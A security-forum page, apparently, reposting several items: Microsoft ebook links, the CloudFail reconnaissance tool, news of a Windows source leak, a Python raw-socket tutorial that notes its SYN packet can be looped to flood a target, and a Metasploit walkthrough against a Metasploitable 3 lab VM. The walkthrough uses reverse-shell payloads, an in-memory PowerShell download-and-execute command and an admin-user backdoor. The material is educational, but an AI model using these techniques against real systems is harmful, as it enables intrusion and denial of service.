PDF PowerShell WINDOWS POWERSHELL 4.0 LANGUAGE QUICK REFERENCE PDF PowerShell Windows PowerShell 4.0 Language Reference Examples PDF PowerShell Windows PowerShell Command Builder User’s Guide PDF PowerShell Windows PowerShell Desired State Configuration Quick Reference PDF PowerShell WINDOWS POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT 4.0 PDF PowerShell Windows PowerShell Web Access PDF PowerShell WMI in PowerShell 3.0 PDF PowerShell WMI in Windows PowerShell 4.0 PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities – Mobile PDF SharePoint Deployment guide for Microsoft SharePoint 2013 PDF SharePoint Microsoft SharePoint Server 2016 Architectural Models PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – 8.5 X 11 PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – Mobile PDF SharePoint RAP as a Service for SharePoint Server PDF SharePoint SharePoint Online Dedicated Service Description PDF SharePoint SharePoint Products Keyboard Shortcuts PDF SharePoint SharePoint Server 2016 Databases – Quick Reference Guide PDF SharePoint SharePoint Server 2016 Quick Start Guide PDF SQL Server 5 Tips For A Smooth SSIS Upgrade to SQL Server 2012 PDF SQL Server Backup and Restore of SQL Server Databases PDF SQL Server Data Science with Microsoft SQL Server 2016 PDF SQL Server Deeper insights across data with SQL Server 2016 – Technical White Paper PDF SQL Server Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm DOC SQL Server Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 DOC SQL Server Guide to Migrating from Oracle to SQL Server 2014 and Azure SQL Database PDF SQL Server Introducing Microsoft Azure™ HDInsight™ PDF MOBI EPUB SQL Server Introducing Microsoft Data Warehouse Fast Track for SQL Server 2016 PDF SQL Server Introducing Microsoft SQL Server 2012 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2014 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 – Mobile PDF SQL Server Introducing Microsoft Technologies for Data Storage, Movement and Transformation DOC SQL Server Introducing Microsoft® SQL Server® 2008 R2 XPS PDF MOBI EPUB SQL Server Microsoft SharePoint Server 2016 Reviewer’s Guide PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Data Mining Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Multidimensional Modeling Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Reporting Services Quick Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Writing Transact-SQL-Statements PDF SQL Server Microsoft SQL Server 2014 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Licensing Datasheet PDF SQL Server Microsoft SQL Server 2016 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Mission-Critical Performance Technical White Paper PDF SQL Server Microsoft SQL Server 2016 New Innovations PDF SQL Server Microsoft SQL Server 2016 SP1 Editions PDF SQL Server Microsoft SQL Server In-Memory OLTP and Columnstore Feature Comparison PDF SQL Server RAP as a Service for SQL Server PDF SQL Server SQLCAT’s Guide to: Relational Engine PDF SQL Server Xquery Language Reference PDF Surface Surface Book User Guide PDF Surface Surface Pro 4 User Guide PDF System Center Guide to Microsoft System Center Management Pack for SQL Server 2016 Reporting Services (Native Mode) DOC System Center Guide to System Center Management Pack for Windows Print Server 2016 DOC System Center Introducing Microsoft System Center 2012 R2 PDF MOBI EPUB System Center Microsoft System Center Building a Virtualized Network Solution, Second Edition PDF MOBI EPUB System Center Microsoft System Center Data Protection for the Hybrid Cloud PDF MOBI EPUB System Center Microsoft System Center Deploying Hyper-V with Software-Defined Storage & Networking PDF MOBI EPUB System Center Microsoft System Center Extending Operations Manager Reporting PDF MOBI EPUB System Center Microsoft System Center Introduction to Microsoft Automation Solutions PDF MOBI EPUB System Center Microsoft System Center Operations Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center Software Update Management Field Experience PDF MOBI EPUB System Center Microsoft System Center: Building a Virtualized Network Solution PDF MOBI EPUB System Center Microsoft System Center: Cloud Management with App Controller PDF MOBI EPUB System Center Microsoft System Center: Configuration Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center: Designing Orchestrator Runbooks PDF MOBI EPUB System Center Microsoft System Center: Integrated Cloud Platform PDF MOBI EPUB System Center Microsoft System Center: Network Virtualization and Cloud Computing PDF MOBI EPUB System Center Microsoft System Center: Optimizing Service Manager PDF MOBI EPUB System Center Microsoft System Center: Troubleshooting Configuration Manager PDF MOBI EPUB System Center What’s new in System Center 2016 White Paper PDF Virtualization Understanding Microsoft Virtualizaton R2 Solutions XPS PDF Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager PDF MOBI EPUB Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager – Mobile PDF Windows Client Getting the most out of Microsoft Edge DOC Windows Client Introducing Windows 10 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 10 for IT Professionals, Preview Edition PDF MOBI EPUB Windows Client Introducing Windows 8.1 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 8: An Overview for IT Professionals PDF MOBI EPUB Windows Client Licensing Windows desktop operating system for use with virtual machines PDF Windows Client Protecting your data with Windows 10 BitLocker DOC Windows Client RAP as a Service for Windows Desktop PDF Windows Client Shortcut Keys for Windows 10 DOC Windows Client Use Reset to restore your Windows 10 PC DOC Windows Client Volume Licensing Reference Guide Windows 10 Desktop Operating System PDF Windows Client Windows 10 IT Pro Essentials Support Secrets PDF PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools – Mobile PDF Windows Client Work Smart: Windows 8 Shortcut Keys PDF Windows Server Automating Windows Server 2016 configuration with PowerShell and DSC DOC Windows Server Introducing Windows Server 2008 R2 XPS PDF MOBI EPUB Windows Server Introducing Windows Server 2012 PDF MOBI MOBI EPUB EPUB Windows Server Introducing Windows Server 2012 R2 PDF MOBI EPUB Windows Server Introducing Windows Server 2016 PDF Windows Server Introducing Windows Server 2016 – Mobile PDF Windows Server Introducing Windows Server 2016 Technical Preview PDF Windows Server Introducing Windows Server 2016 Technical Preview – Mobile PDF Windows Server Introducing Windows Server® 2012 R2 Preview Release PDF MOBI EPUB Windows Server Offline Assessment for Active Directory PDF Windows Server RAP as a Service for Active Directory PDF Windows Server RAP as a Service for Failover Cluster PDF Windows Server RAP as a Service for Internet Information Services PDF Windows Server RAP as a Service for Windows Server Hyper-V PDF Windows Server Sursa: Windows Server 2016 Licensing https://blogs.msdn.microsoft.com/mssmallbiz/2017/07/11/largest-free-microsoft-ebook-giveaway-im-giving-away-millions-of-free-microsoft-ebooks-again-including-windows-10-office-365-office-2016-power-bi-azure-windows-8-1-office-2013-sharepo/ PDF
  16. Exercitii: http://malware-traffic-analysis.net/training-exercises.html Tutoriale: http://malware-traffic-analysis.net/tutorials/index.html
  17. Usr6

    CloudFail

    CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. Misconfigured DNS scan using DNSDumpster.com. Scan the Crimeflare.com database. Bruteforce scan over 2500 subdomains. Please feel free to contribute to this project. If you have an idea or improvement issue a pull request! Disclaimer This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool. Usage To run a scan against a target: python cloudfail.py --target seo.com To run a scan against a target using Tor: service tor start (or if you are using Windows or Mac install vidalia or just run the Tor browser) python cloudfail.py --target seo.com --tor Dependencies Python3 argparse colorama socket binascii datetime requests Download:https://github.com/m0rtem/CloudFail
  18. Exclusive A massive trove of Microsoft's internal Windows operating system builds and chunks of its core source code have leaked online. The data – some 32TB of official and non-public installation images and software blueprints that compress down to 8TB – were uploaded to betaarchive.com, the latest load of files provided just earlier this week. It is believed the confidential data in this dump was exfiltrated from Microsoft's in-house systems around March this year. The leaked code is Microsoft's Shared Source Kit: according to people who have seen its contents, it includes the source to the base Windows 10 hardware drivers plus Redmond's PnP code, its USB and Wi-Fi stacks, its storage drivers, and ARM-specific OneCore kernel code. Anyone who has this information can scour it for security vulnerabilities, which could be exploited to hack Windows systems worldwide. The code runs at the heart of the operating system, at some of its most trusted levels. Leaked ... Screenshot of a Beta Archives posting announcing on Monday, June 19, the addition of Microsoft's confidential source code archive In addition to this, top-secret builds of Windows 10 and Windows Server 2016, none of which have been released to the public, have been leaked among copies of officially released versions. The confidential Windows team-only internal builds were created by Microsoft engineers for bug-hunting and testing purposes, and include private debugging symbols that are usually stripped out for public releases. This software includes, for example, prerelease Windows 10 "Redstone" builds and unreleased 64-bit ARM flavors of Windows. There are, we think, too many versions now dumped online for Microsoft to revoke via its Secure Boot mechanism, meaning the tech giant can't use its firmware security mechanisms to prevent people booting the prerelease operating systems. Also in the leak are multiple versions of Microsoft's Windows 10 Mobile Adaptation Kit, a confidential software toolset to get the operating system running on various portable and mobile devices. Netizens with access to Beta Archive's private repo of material can, even now, still get hold of the divulged data completely for free. It is being described by some as a bigger leak than the Windows 2000 source code blab in 2004. Spokespeople for Microsoft declined to comment. ® Updated to add Beta Archive's administrators are in the process of removing non-public Microsoft components and builds from its FTP server and its forums. For example, all mention of the Shared Source Kit has been erased from its June 19 post. We took some screenshots before any material was scrubbed from sight. You'll notice from the screenshot above in the article and the forum post that the source kit has disappeared between the Microsoft Windows 10 Debug Symbols and Diamond Monster 3D II Starter Pack. The source kit is supposed to be available to only "qualified customers, enterprises, governments, and partners for debugging and reference purposes." In a statement, Beta Archive said: "The 'Shared Source Kit' folder did exist on the FTP until [The Register's] article came to light. We have removed it from our FTP and listings pending further review just in case we missed something in our initial release. We currently have no plans to restore it until a full review of its contents is carried out and it is deemed acceptable under our rules." Sursa: https://www.theregister.co.uk/2017/06/23/windows_10_leak/
  19. Raw sockets allow a program or application to provide custom headers for the specific protocol(tcp ip) which are otherwise provided by the kernel/os network stack. In more simple terms its for adding custom headers instead of headers provided by the underlying operating system. Raw socket support is available natively in the socket api in linux. This is different from windows where it is absent (it became available in windows 2000/xp/xp sp1 but was removed later). Although raw sockets dont find much use in common networking applications, they are used widely in applications related to network security. In this article we are going to create raw tcp/ip packets. For this we need to know how to make proper ip header and tcp headers. A packet = Ip header + Tcp header + data. So lets have a look at the structures. Ip header According to RFC 791 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Every single number is 1 bit. So for example the Version field is 4 bit. The header must be constructed exactly like shown. TCP header Next comes the TCP header. According to RFC 793 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Create a raw socket Raw socket can be created in python like this #create a raw socket try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) except socket.error , msg: print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] sys.exit() To create raw socket, the program must have root privileges on the system. For example on ubuntu run the program with sudo. The above example creates a raw socket of type IPPROTO_RAW which is a raw IP packet. Means that we provide everything including the ip header. Once the socket is created, next thing is to create and construct the packet that is to be send out. C like structures are not available in python, therefore the functions called pack and unpack have to be used to create the packet in the structure specified above. So first, lets make the ip header 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 source_ip = '192.168.1.101' dest_ip = '192.168.1.1' # or socket.gethostbyname('www.google.com') # ip header fields ip_ihl = 5 ip_ver = 4 ip_tos = 0 ip_tot_len = 0 # kernel will fill the correct total length ip_id = 54321 #Id of this packet ip_frag_off = 0 ip_ttl = 255 ip_proto = socket.IPPROTO_TCP ip_check = 0 # kernel will fill the correct checksum ip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to ip_daddr = socket.inet_aton ( dest_ip ) ip_ihl_ver = (version << 4) + ihl # the ! in the pack format string means network order ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) Now ip_header has the data for the ip header. Now the usage of pack function, it packs some values has bytes, some as 16bit fields and some as 32 bit fields. Next comes the tcp header 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 # tcp header fields tcp_source = 1234 # source port tcp_dest = 80 # destination port tcp_seq = 454 tcp_ack_seq = 0 tcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes #tcp flags tcp_fin = 0 tcp_syn = 1 tcp_rst = 0 tcp_psh = 0 tcp_ack = 0 tcp_urg = 0 tcp_window = socket.htons (5840) # maximum allowed window size tcp_check = 0 tcp_urg_ptr = 0 tcp_offset_res = (tcp_doff << 4) + 0 tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5) # the ! in the pack format string means network order tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr) The construction of the tcp header is similar to the ip header. The tcp header has a field called checksum which needs to be filled in correctly. A pseudo header is constructed to compute the checksum. The checksum is calculated over the tcp header along with the data. Checksum is necessary to detect errors in the transmission on the receiver side. Code Here is the full code to send a raw packet 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 ''' Raw sockets on Linux Silver Moon (m00n.silv3r@gmail.com) ''' # some imports import socket, sys from struct import * # checksum functions needed for calculation checksum def checksum(msg): s = 0 # loop taking 2 characters at a time for i in range(0, len(msg), 2): w = ord(msg) + (ord(msg[i+1]) << 8 ) s = s + w s = (s>>16) + (s & 0xffff); s = s + (s >> 16); #complement and mask to 4 byte short s = ~s & 0xffff return s #create a raw socket try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) except socket.error , msg: print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] sys.exit() # tell kernel not to put in headers, since we are providing it, when using IPPROTO_RAW this is not necessary # s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # now start constructing the packet packet = ''; source_ip = '192.168.1.101' dest_ip = '192.168.1.1' # or socket.gethostbyname('www.google.com') # ip header fields ip_ihl = 5 ip_ver = 4 ip_tos = 0 ip_tot_len = 0 # kernel will fill the correct total length ip_id = 54321 #Id of this packet ip_frag_off = 0 ip_ttl = 255 ip_proto = socket.IPPROTO_TCP ip_check = 0 # kernel will fill the correct checksum ip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to ip_daddr = socket.inet_aton ( dest_ip ) ip_ihl_ver = (ip_ver << 4) + ip_ihl # the ! in the pack format string means network order ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) # tcp header fields tcp_source = 1234 # source port tcp_dest = 80 # destination port tcp_seq = 454 tcp_ack_seq = 0 tcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes #tcp flags tcp_fin = 0 tcp_syn = 1 tcp_rst = 0 tcp_psh = 0 tcp_ack = 0 tcp_urg = 0 tcp_window = socket.htons (5840) # maximum allowed window size tcp_check = 0 tcp_urg_ptr = 0 tcp_offset_res = (tcp_doff << 4) + 0 tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5) # the ! in the pack format string means network order tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr) user_data = 'Hello, how are you' # pseudo header fields source_address = socket.inet_aton( source_ip ) dest_address = socket.inet_aton(dest_ip) placeholder = 0 protocol = socket.IPPROTO_TCP tcp_length = len(tcp_header) + len(user_data) psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length); psh = psh + tcp_header + user_data; tcp_check = checksum(psh) #print tcp_checksum # make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr) # final full packet - syn packets dont have any data packet = ip_header + tcp_header + user_data #Send the packet finally - the port specified has no effect s.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target Run the above program from the terminal and check the network traffic using a packet sniffer like wireshark. It should show the packet. Raw sockets find application in the field of network security. The above example can be used to code a tcp syn flood program. Syn flood programs are used in Dos attacks. Raw sockets are also used to code packet sniffers, port scanners etc. sursa: http://www.binarytides.com/raw-socket-programming-in-python-linux/
  20. Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete. use exploit/windows/http//manageengine_connectionid_write Copy Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here: RHOST: the target address. This will be the IP address of our target host - 192.168.0.206 RPORT: the target port. During our Nmap portscan, we found the service running on 8022. TARGETURI : the path for the Desktop Central software. Leave this is the standard setting. To set your own settings, you need to execute set SETTING value, e.g.: set RHOST 192.168.0.206 Copy set RPORT 8022 Copy Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage. Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell. A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on. Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems. To attach a meterpreter payload to our exploit, use the following command: set payload windows/meterpreter/reverse_tcp Copy If you run show options again now, you will see that Payloads options are visible now: LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241 LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444. Set our listen adress to our own address: set LHOST 192.168.0.241 Copy We're set to fire the exploit. Simply type: exploit Copy As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell. Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell. A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command: We're set to fire the exploit. Simply type: python -m SimpleHTTPServer Copy Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct. set payload windows/powershell_reverse_tcp Copy And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script in the memory, execute the following command in PowerShell: IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1") Copy Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt Invoke-AllChecks | Out-File allchecks.txt Copy To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here. As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc.. Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice! The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Copy Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group. Install-ServiceBinary -Name 'OpenSSHd' Copy Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit) Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!. Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work. Sursa: https://www.zero-day.io/metasploitwalkthrough/
  21. In this post we will set up a virtual lab for malware analysis. We’ll create an isolated virtual network separated from the host OS and from the Internet, in which we’ll setup two victim virtual machines (Ubuntu and Windows 7) as well as an analysis server to mimic common Internet services like HTTP or DNS. Then, we’ll be able to log and analyze the network communications of any Linux or Windows malware, which will unknowingly connect to our server instead of the Internet. We demonstrate the setup with a real life use case where we analyze the traffic of the infamous TeslaCrypt ransomware, a now defunct ransomware which infected a large number of systems from 2015 to mid-2016. Diagram of our future setup. Note that the machines in the virtual network will be isolated from the host OS and will not be able to connect to the Internet. This guide includes quite a lot of material, so here’s a table of contents to give you an overview of what we’ll cover and let you jump directly to a section if you’d like. Creating the virtual machines Setup of the analysis machine: INetSim, Burp Creating an isolated virtual network Creating and restoring snapshots Using INetSim and Burp on the analysis machine to analyze the network traffic Setting up a shared folder between the analysis machine and the host OS Demo time: the TeslaCrypt ransomware Conclusion 1. Creating the virtual machines Here are two links you can use to download Ubuntu and Windows 7 virtual machine images. Ubuntu (victim machine 1 and analysis machine): download Ubuntu 16.10 64 bits from OsBoxes (direct link) Windows 7 (victim machine 2): download from the Microsoft Developer Website (select IE 11 on Win 7 (x86) and VirtualBox) Tip: if you already have an Ubuntu virtual machine you’re not using, you can simply clone it and reuse it in the next steps (right click > Clone). Before starting, make sure you have enough disk space available (I’d recommend at least 10-20 GB). Base Ubuntu machine OsBoxes provides us with a ready-to-go virtual disk that we can simply plug on a VM and start using right away. Start by extracting the archive you just downloaded. $ 7za e Ubuntu_16.10_Yakkety-VB-64bit.7z You’ll be provided with a VDI file representing the virtual disk of the machine. We’ll start by setting up the base Ubuntu image, which we will then clone to have our two Ubuntu VMs. In VirtualBox, create a new machine (New button), and call it Ubuntu analysis. Then, select how much RAM you want to give it. At this point, VirtualBox will ask you if you wish to create a new virtual hard disk or use an already exiting one. Select Use an existing virtual hard disk file, click on the directory icon at the right of the dropdown list, and select the VDI file. You can then power up the machine. The default password is osboxes.org. Basic setup The default keyboard uses the QWERTY layout. If like me you’re not familiar with it, start by changing it (Settings > Text Entry). Optionally, you can also change the default password using: $ passwd osboxes It can also be a good idea to update your packages. $ sudo apt-get update $ sudo apt-get upgrade Install the guest additions Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs. You will then be asked if you want to run the installer; 